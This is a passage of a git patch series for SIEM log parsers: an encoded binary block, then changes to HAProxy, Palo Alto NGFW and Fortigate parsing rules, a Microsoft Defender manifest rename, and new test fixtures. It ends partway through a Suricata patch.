z=R7bzKCXvwP5f}uI6=is)rjy>m#o~GQN5u6&u0kZ<{iJ{^Rl9+7-Ig$gF&@4tbAvW8%*B!O6J*?B=du;hcM&I3K_Ff|w;swd_8}=b?1&JqhkjaY_aS z^b5LqqpZl%_ep#s+KzsH=k4S($7FJSO!Srxoe(Tl>dLq?DMBK#M%#FM>l84ae2xW6 zp_m)~l(5D3Ce^=mxYQm*1XV(krt0m+_#@%3t$#VI9cCfDz`n76gP8ppik*H+K zZT{&e1F;ZF_OQj%royE^r%gQn(F^jhxzku}uleB^)h81=o&&abH#avU3k#nBhUrTO ztyS2pvm#JhTbCz4VMDnze%uxJU?$njgD!n?m*T!!wo5Kext(#s>Q?|$LOc)9-~2$J zl5x0h_K73HbY^??{QYxo_^lX@w(n#A3o*$=Q{nc|sU>|rEnYev#!e3=lJY!1$jI!d zp!ESG4yBEh&LqC_uN0To_Uup37b#XFmgr8{JH;_VFSlct|NKHsuPAEc-jpYEv5n=Z zm!{Zt944C6-y?_n zLJfAMj6jeh2xocL#OAui?^hwkSLcM&Pvzp?^hTlMVpNS`7hCzse!qkr$cuGf`y~+XjoRjjqn#-C)99m z8M3AqQI)TC(M*bcSxhz+jw0W>M*`hO0s(=gJsw{lxUpm6r^ZHL+V2)oi1Ek==*ZtCmP7Vx%voClFzk>~;A@zp-8k&1Vm7bVp zwtAyNyID-Z7P&RtoR6*0p@kx)?1un@1=cHPl2>q==-zK`i(~U;tGYj*EN7-((^y_| zsbd_@yOIPm^LEkq3trq4l#(*>?k82Ysj9k8J`F+MfSI+y5HOy8>2}sOBWMA%W`7L0 z+Y|&pKNALOBKjSQ6%zqvYFX4%=D|19@{YAJzpHH+x_V$>U?v_M2O2N!M`f%{ijTGz zL3Ot^kX?aIklgxA3Z2zZB%K;DsKPP8F|)oOMidL_y!A2~snMOan0^Elb#tAH=-UMc z0&xG~p~uwW@aso(9K4r60sCA)k(DPbs?6%vR*ZIu?xoijY|B5wn7ntsZ$zNl_r0=V?h4HC~F`m!%3q8|bd3n=qBX`B$Jhn8o$WOF*-NU9&WkpEwzQPvY_8N*( zG2y+S!&SrJ^#(8NVFXn=0Gc6rclk#&S(D3by(4aL5Qldn^?Hmp^&P9Z8t2{m_a^s` z{5y_D6%V8V<{V8(m%+lX=snpyaJ}HIGD)lRs zYCmnc`j`?*7N0>w&39cjqfYA+Jj=f;-kjbwt4F)C^$^rGwQUW}iF4t`nS!$qfbk#- zOU}`jD2Xsl38qd{JzBPn4(9mZqS4hE+|-KPM5K(a6Gg*gty`68OvmQ6KkUdMJif6E z#EaQ?YPp#K=IQWTBnj&N@-8TaNlT{NbFJtFDgS-F#5)rs`u_Cn?y7k1HR>;X?lWn7 zT2Zo(dt4UWUxX-?dTp4`x@z2eHnopejC8XNqn#7)*f~d=ZXbO}4|_1}lBhaB2D$2z zl}!7YT%pw2g6}=1$wLVXg~@~(KXIgHnII~;slp0;{UMsh~K&-`Vej(cb#qwE+PP#&bs zb1}b#>3~R<#OJp(Y2%0$@=^X4yv`rHLg^v{UT|}8`WCOf<&5V)4_>>~a~dPBb5d08 zY9VmO^y776a)PQy!RXt<%>XWv zdgbi>;Rg=^`$AGEOWl)BjUmR4R{BQ}qr2R1E&{19x^lnL0zE*dL9bQ9iSCtuAHc|T z20?Y#ZHeE1b-5z|?(9_N+a|BfY^2?i6WPKohFDVE-d{40v1SCl=>YAc?KZv#pzSgT0+TKY(#tiSCHSsFfDQhGSeCZ(!cVUPD zmxGLr%*N>7snNu;p8Y`31bv_hdsmSdjJ!z#c01iDdi$3N6)lu5?^l$4F_RqnYb0uA z)8eDncvVFpwFA>DIR4BjjH{D1VS57Q#`)OT5+UcrNo+`7Vm~pX#i1+vlI?;V;o4z{ zNX34A+U*oAcYzuH$6R2kAd-1%(NH(B*RzlX7%1Wse~HhKJ`y35dP2UG&!*}>X3`V< zn^{7_LZrrmylfZc?v%6>*#-UNb`vV4=2PGZnt25KtxV8}Q?rn9Vj^(vUC9pmWjoZA z&~9K>?i5CiLwUKj98+wL(>$w#`v{8jlJIE>#dV4qg5f|!- z?!bG!&&gB$YWAc9eDs8uEzI0=$|TVJ$^fy)4na4d6$%7CDm~X*w=Y%exbxyy9-WRb zgT>2leLtbD4o@`rCaTq7P0syyx6ht7Jv*4vS&f?}MIN6h&98aA>RVu-!^hUTHCCdD zx=DCyyd!2#i}?0M1O@9%6^6~Nr^ZezUP*sm`h4TN?pvwnG?Wp%Lr!d{k(rY-pGM}@ zk6%L0`*4LCiFPhuU#xL0;!Acl(+UT7p)^DP$NuP?LREvG6>k ze}?s8{KPH?^$>J#xWs%BE{f1zfMD+qc+yRZ(8!)$T#{#4LDFbuh73%Z$yY8oXs&_KH@IPhIh zdw`j#4rlAV+$Xg(e_GdWf-aVXvfe(X{QB2wi2ENLaHcdUF0V&-hdI!KE5jU z69wuV9TahcS1W1n4P0mI*ZD{QXmz2tj4yFBfTd}=2h!dmk{VOve11dsj7T;+e{qp< zWG$A6ct)aIRsoebxaj9HpWb4P?o#KRpXO#me{j)XX;4x_z#H{< zY<&2t=erEe>v@7I-`(lOnYc=`%XxFy8Oz!AuCQLw2<$oBPaF*PTiq=6q=@y*CwJ`Osqa6D`9Bb`1XbFAxvl z{@njYK;y;q(h3|Q5$*#1H9ygH`$4m*oDS(MCpt%Hm3EzM0=ZRI~$3JWWe#{G{8D>t^9mm7Udcl=A zlbX3nKEO?lP7+>yJq&+2^Gc9$P#CYHaB=^|i!nz(<2Pr)JdBx8NkI`>i}+>FrA%lN zYQR0yyPjz&3R+1Xd7`8gn=-P&oosr=2zpIky{8~aocA^|x~pQ}@A4*tv$I6h=o+df zlp3ro@j29*bMDjIr;qQZ&ftFxTuEp?cQK+2YYx+xIN_&$>-qc++h$-sv>Jmo-vhTp zXcPP0D)s{Omu;n;G|}3>!e|HQ!>z`yOSg(ayQ?g>{}NY^#JyUtH$TF9AlRkHV(`@~ zi6Ln~ppPxOgov_nYH~cdaI|OaKrEGz@;mqiwX>oTej$P8R~%CtWY_VL0!0Mz73H~J z!+9T4)s&T#v$JU{Vbd453uHTU$dAU;e8Z_b*&%9&EE?|I{=EQrXO!m<6FKd~A3ZH9 z{b7pgjYsG@nD{vQKeMURK@%=D*8U*eATW4W1?Mqn&y4_6$dcibbbA7+-C&7iYuC!P7 zx8dgAZ*1WH*1&KUh;N;Ojp@WmXvlVHM$`VwV<~qLG1Q?jXmB0hreXHkn0=b^*|{Hc z80FjNBNsvpo$e$#_1ub>)nW7xe)97t14*68H0!qSm!rVNm}dN1$o^z@oI~l@wUM&I zDJ(1;=3vhVNn2{zoVjcINpFt<& zFEOF7fYTul#(_YV2GrE-+vc>D0?MLdz|w1ZwsNh&A^5!Ko?Z|3gC1|cb~41o40HaU zOi5#?(_BIqk$YapBikmKrCyfZsRi)9uHKezNLUU8$RFnoT~DeeOTVqE3vHOcyY_JZ zUbv$pNPlFsHB5`6pEnqLWyIQ-n~ z(~hJP_QuG~04-It)@|Feg1uvbr|C-)m?fOt=1(30!Dgv!!Y{^dBNwC{>%vlb< z=z^niGIP*ZSUN(UHAT7P!O~3NR2c-Y{x8{%*SWnuA$-T=pzeOR6ve7OIDiliS?HUlH}tC-BqPk?zCQ(&vJ9{Bf9 zMORmsQw!iRq+W^o4gUs~ru3L3B2t6JACZ1V+FN@@jT}_u5@=0P^*8XJ&kmB-p{7n& z3mkH9{eD>oLY#5%+}E)#qu?i;xp>a+Pk5s3+1sB*i6ZGeV_jd zIS6*<6a2JOWHS!5_tWM^8EM5}xJIRGR=;gEv+uDI&v{=2q_HcO zl#T(odO$OXnl^hGGO(`^hCLC!Ve~608}+h2AOPCF9XCl?S&Eqcr0lO94SfHuIlAs8OH$jq zQdV%)W!@UP1{0;kqXRjF55y<3@CA{uZN@D#ebr9s)HYWug3bw{9lX80!w&6*=#haa z$ucM~TlHBv9FHH>Yd-?;deuQ(-tWaaT734!w`A^;QRdHmQ^M@++a zM5Y|kRyDLAj1B{K2>XP=;*5X_OR9jUtjUCQS_J$57Qo0c4K4f7i5OE~1wi!av9UVl zU0rTJ@jhWN6?>HC`q1y=i3UKgILuuLxK*<$1?{~p$@fb$^VB%^AAR|~TRhR15_~oZ z)P@=}kA%A?woiKjzjaL2J5F(}hVyf!JY8TYa7?Rm{s)hnxqmRyQ8WYJZeee55}rRp zMJeT@KrcFjt_C9J=znMX&ajinA%EbChekK+Imv395quCXWOD9OdmDUL^wW^dO~tr- zQxIw{!Zw%K)b@U9(U}<$`hukxW{!DFkTC@56v-QE^i}fa+#BAz%Kvl7&nW69Zq?gg z?{?{X^HULMrX)l~r;i?*1IXQySr1mxA#zs_At@yE-jG+n!xW58AF^REL9*s)qLslv zycCESJXvq0v(#^%zZCq{6h3g$VIP#AQAuTjTe!fbE63_bM%<|dbzk6;;|Ix#&>54G zllP-LqC5X%X?_2rU^3bZ0C()Mqy#WN33O$p68WP1VqqIv*0TL|i0E6QM6I!YD25Wa z1oGt=NVD>0f?KZe@0Ff6kjrI1^zCP;+D=rlax!lK2F`6V(;4jI!kh8-=@P(Gm(2z2 zttlK|mt%^J4)n*euDAe2_*Ci zTWyg&m%{jsotU+UV9#}p7cYRLG6Z0eP@JEKh^Q_b^|*|SU_kf?Jw5j&(#9f&l)c?= z|LV`$+8W;*%HS!6hU)nN7UqZF{<15FHU?qxWAO)HcE}UN9(R;%hN!S=ImuHSmyPG} z9d@7QpWc`;p;-238#V=o;^R;H#AnXi_~0tGHQwuD9ha8@EzhLs5pT;UleIV=xKj!C zQ&tzG}7-uci+D`bDOo?rG^jf*;39$KsW0 z{%n;T*y2aDgSlyNI>1sRfQVDL0ofd@=X60W-BMbF;FC#!Bvg&_m%91by4N!a(7RBd zeu~UX6C;#=Ujn`oph6w$hZjWdqp1A zl`j>IOS+pULa#gxRSv8|9Xs>6?>U=gs6Ulud;d({D>^?-7syFRm;k7A%8zw7D3g8p zs<=$}d=;`G+Vx{xF1`gkF1G^4`6{K&JONCry;$jF-pKQL`|WI;T)S$`4%~JgLH<{Q ze`QyxP`@zA^r-p091?p3n3pVlgXaNiNz5+#nt|{%`mkKLCeZ&2MJX8h0c|)w9m3ahh3oy({*Qgz($4swK~wmJsxdF zjngNUb}g4(>|9nY<>3@c+tAEp`#3M0Hxz8vAWjaGHTLX%)CiyTBk0zq#!Hu*KbLBZ z&Mq4j+f`DIpv}#(v$N}x+%Io_G&pZEz;|v%WU0M3;#6!r6{7`2ZImsdspYS>&a&0) zC+Oe$J*kAvfN0m5RK;?0B6r(3fp~|s2wkGIE*Q_o|QK+%EEWFQ*W^Uf4qjl&F=pgV=7nGKKv z;X495H7mb9p(=J{%O)KyJ&+C-1XXbuENWr9{C3WcUK6|(`)gy?{ca~m?cYU!-fQ^Z z?$Pg{JsYSBS=51q(0+#|*QvEb?+Y6)@U<-C+CiOgUZ?_Kc2yopKjM~rrO5dgR?4a% z*8JC>Jf1)6v5A`QGwKQKgqVi?HP$Jdgv&!Z9h?2UX}Y~N+OJpiUoCecYJR|Ir=;C$T?WFSWTsaWNfZx2;rOU`j53yUT4*k5 zVeb&hb1pWGkQA6xL(Oi&e@RaCdU?Ui_7|vkh3@)WKI@|Y8%2sEwX?T3mWhGExVvl! zq$~^quQVlrzSdc7b(iu_!J9MeU0i~kyPhIiUFk4HcDLmKN=H|3Zfcl`GAl%rg=hb$ z;hW({-~Q2*4Z*MvB)bxyz5;b^#qALt_wIaDy{y=I48{?MXAr)5k*`^V zTeO@S+iqJ^QAJsjQoSNw-kqKsvlGf<9KSgxnP ziZ&Giyvs%?D@ourkOn~~UF&d=@bKspgvT*}7fCHLFakBCHve&ef*bdo_wy9iY^Y`- z`-Zdw?Xwp+dcFCw+OZi%>ro<)uS)HT;8?sqpoYpvhTY!yM2d!LD;)5%#e#iRW;6;- zb3hA!u{Yk2q}FIpq%bD$OxU^~)84@Ym!Hx+rOcraN&*5SvgEEe#>|Y2?XkOUz@pW~ zyQZx@#hI)9y~LIw&%J?-+!lyi3Gcfwf`B4L3$`=F=2fw@`-}}`?#NfM{)mxLvfp>H z0VGA$&8}#ZCrI2Bo&N@mi-s+Ig^7*+{2APA{jqdCu2iQ|kV=Jy&OS-Tf-rn!-75ceuVY)J@af{xO~L z^=e(%2ZDNG68?wFm~UeE@4x`5u0c*g0VrCIY!8%&f)v5bRI}7Ee+xbcqJTKm*+JIJ zo|6t?@RRQ8BR#IJ Date: Tue, 3 Dec 2024 17:57:02 +0100 Subject: [PATCH 123/150] chore(Microsoft): rename the Microsoft Defender XDR format --- Microsoft/microsoft-365-defender/_meta/manifest.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/manifest.yml b/Microsoft/microsoft-365-defender/_meta/manifest.yml index 1c858333a..d2e9192ce 100644 --- a/Microsoft/microsoft-365-defender/_meta/manifest.yml +++ b/Microsoft/microsoft-365-defender/_meta/manifest.yml @@ -1,11 +1,11 @@ uuid: 05e6f36d-cee0-4f06-b575-9e43af779f9f -name: Microsoft 365 Defender +name: Microsoft Defender XDR / Microsoft 365 Defender slug: microsoft-365-defender automation_connector_uuid: 57f8f587-18ee-434b-a4ed-b5459f5b0fef automation_module_uuid: 525eecc0-9eee-484d-92bd-039117cf4dac description: >- - Microsoft 365 Defender is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications. + Microsoft Defender XDR is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications. Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats. From c03be93f20e239d55f6dc312cc7579e47d1c92a4 Mon Sep 17 00:00:00 2001 From: rombernier Date: Wed, 4 Dec 2024 16:49:13 +0100 Subject: [PATCH 124/150] update HA procy --- HAProxy/haproxy/CHANGELOG.md | 4 +++ HAProxy/haproxy/ingest/parser.yml | 2 +- HAProxy/haproxy/tests/access4.json | 45 ++++++++++++++++++++++++++++++ 3 files changed, 50 insertions(+), 1 deletion(-) create mode 100644 HAProxy/haproxy/tests/access4.json diff --git a/HAProxy/haproxy/CHANGELOG.md b/HAProxy/haproxy/CHANGELOG.md index 60e2c8a26..9896476a3 100644 --- a/HAProxy/haproxy/CHANGELOG.md +++ b/HAProxy/haproxy/CHANGELOG.md @@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +## 2024-12.04 - 1.0.1 + +- Add support for aktci at the end of the log + ## 2024-03.04 - 1.0.0 ### Added diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml index 98783cd3d..e1f5a3c88 100644 --- a/HAProxy/haproxy/ingest/parser.yml +++ b/HAProxy/haproxy/ingest/parser.yml @@ -14,7 +14,7 @@ pipeline: ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9]) HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" TLS_PROTOCOL: "TLS" - HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?' + HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?( aktci:\"%{IP:aktci}\")?' - name: json filter: "{{grok.message.json_msg | length > 0}}" diff --git a/HAProxy/haproxy/tests/access4.json b/HAProxy/haproxy/tests/access4.json new file mode 100644 index 000000000..89630f6bc --- /dev/null +++ b/HAProxy/haproxy/tests/access4.json @@ -0,0 +1,45 @@ +{ + "input": { + "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n", + "sekoiaio": { + "intake": { + "dialect": "HAProxy", + "dialect_uuid": "ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9" + } + } + }, + "expected": { + "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n", + "event": { + "kind": "access" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "bytes": 1060, + "status_code": 200 + }, + "version": "1.1" + }, + "related": { + "ip": [ + "90.83.225.109" + ] + }, + "source": { + "address": "90.83.225.109", + "ip": "90.83.225.109", + "port": 54761 + }, + "tls": { + "version": "1.2", + "version_protocol": "TLS" + }, + "url": { + "original": "/path/get/resource", + "path": "/path/get/resource" + } + } +} \ No newline at end of file From d6c0b58dcc4ebd765b594f8bc1121b35800a695b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 6 Dec 2024 10:44:29 +0100 Subject: [PATCH 125/150] Fix quotes problem in reason message --- .../paloalto-ngfw/ingest/parser.yml | 2 +- .../tests/test_system_event_13.json | 74 +++++++++++++++++++ 2 files changed, 75 insertions(+), 1 deletion(-) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 944713355..c6cf58abe 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -626,7 +626,7 @@ pipeline: AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}" REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}' REASON2: "ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}" - REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}" + REASON3: "When authenticating user '?%{WORD:user}'? from '?%{IP:source_ip}'?, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile '?%{WORD:auth_profile}'?, vsys '?%{WORD:vsys}'?, Server Profile '?%{WORD:server_profile}'?, Server Address '?%{IP:destination_ip}'?" REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}" REASON5: 'authenticated for user %{WORD:user}\. auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.' filter: '{{parsed_event.message.get("EventDescription") != None}}' diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json new file mode 100644 index 000000000..780d2a093 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json @@ -0,0 +1,74 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + }, + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00" + }, + "expected": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", + "event": { + "category": [ + "authentication" + ], + "dataset": "system", + "reason": "When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-26T21:10:01.627000Z", + "action": { + "name": "auth-success", + "type": "auth" + }, + "destination": { + "address": "1.7.4.2", + "ip": "1.7.4.2" + }, + "log": { + "hostname": "FWPAN00", + "level": "informational", + "logger": "system" + }, + "observer": { + "name": "FWPAN00", + "product": "PAN-OS", + "serial_number": "02410100000000" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", + "Threat_ContentType": "auth", + "authetification": { + "profile": "FWPA" + }, + "server": { + "profile": "RADIUS_RSA" + }, + "vsys": "shared" + }, + "related": { + "ip": [ + "1.2.5.5", + "1.7.4.2" + ], + "user": [ + "test000555" + ] + }, + "source": { + "address": "1.2.5.5", + "ip": "1.2.5.5" + }, + "user": { + "name": "test000555" + } + } +} \ No newline at end of file From 4c7891951ac1ac6dcfc605331cda92476af2c577 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 6 Dec 2024 10:48:35 +0100 Subject: [PATCH 126/150] Apply linter --- .../paloalto-ngfw/tests/test_system_event_13.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json index 780d2a093..b4429340a 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json @@ -1,12 +1,12 @@ { "input": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", "sekoiaio": { "intake": { "dialect": "Palo Alto NGFW", "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" } - }, - "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00" + } }, "expected": { "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", From 930934b0e3b3ea8eb27f023e9bf8a5aba899d80b Mon Sep 17 00:00:00 2001 From: Bichoumac Date: Mon, 9 Dec 2024 20:05:57 +0100 Subject: [PATCH 127/150] Adding a possible value to destination.domain on Fortigate logs Adding the value of remotename to the field destination.domain --- Fortinet/fortigate/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Fortinet/fortigate/ingest/parser.yml b/Fortinet/fortigate/ingest/parser.yml index 311e0deb0..4cda504c7 100644 --- a/Fortinet/fortigate/ingest/parser.yml +++ b/Fortinet/fortigate/ingest/parser.yml @@ -191,7 +191,7 @@ stages: event.action: "{{parsed_event.message.name or parsed_event.message.FTNTFGTaction or parsed_event.message.FortinetFortiGateaction or parsed_event.message.act or parsed_event.message.action or parsed_event.message.reason}}" destination.address: "{{parsed_event.message.dstip or parsed_event.message.dst}}" destination.bytes: "{{parsed_event.message.rcvdbyte or parsed_event.message.in}}" - destination.domain: "{{parsed_event.message.hostname or parsed_event.message.dhost}}" + destination.domain: "{{parsed_event.message.remotename or parsed_event.message.hostname or parsed_event.message.dhost}}" destination.mac: "{{parsed_event.message.dstmac}}" destination.nat.port: "{{parsed_event.message.destinationTranslatedPort}}" destination.packets: "{{parsed_event.message.rcvdpkt or parsed_event.message.FTNTFGTrcvpkt or parsed_event.message.FortinetFortiGatercvdpkt or parsed_event.message.get('Packets Received')}}" From e7c29187f511ca9f20cce388986d707577befc53 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 10 Dec 2024 11:17:39 +0100 Subject: [PATCH 128/150] fix(HAproxy): change the way to handle additional information --- HAProxy/haproxy/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml index e1f5a3c88..557604c8a 100644 --- a/HAProxy/haproxy/ingest/parser.yml +++ b/HAProxy/haproxy/ingest/parser.yml @@ -14,7 +14,7 @@ pipeline: ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9]) HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" TLS_PROTOCOL: "TLS" - HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?( aktci:\"%{IP:aktci}\")?' + HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?%{GREEDYDATA}' - name: json filter: "{{grok.message.json_msg | length > 0}}" From b597fe1c7d554917f5fe9b702553d9a03c05a535 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 10 Dec 2024 12:31:20 +0100 Subject: [PATCH 129/150] fix(Suricata): fix smart-description --- Suricata/suricata/_meta/smart-descriptions.json | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Suricata/suricata/_meta/smart-descriptions.json 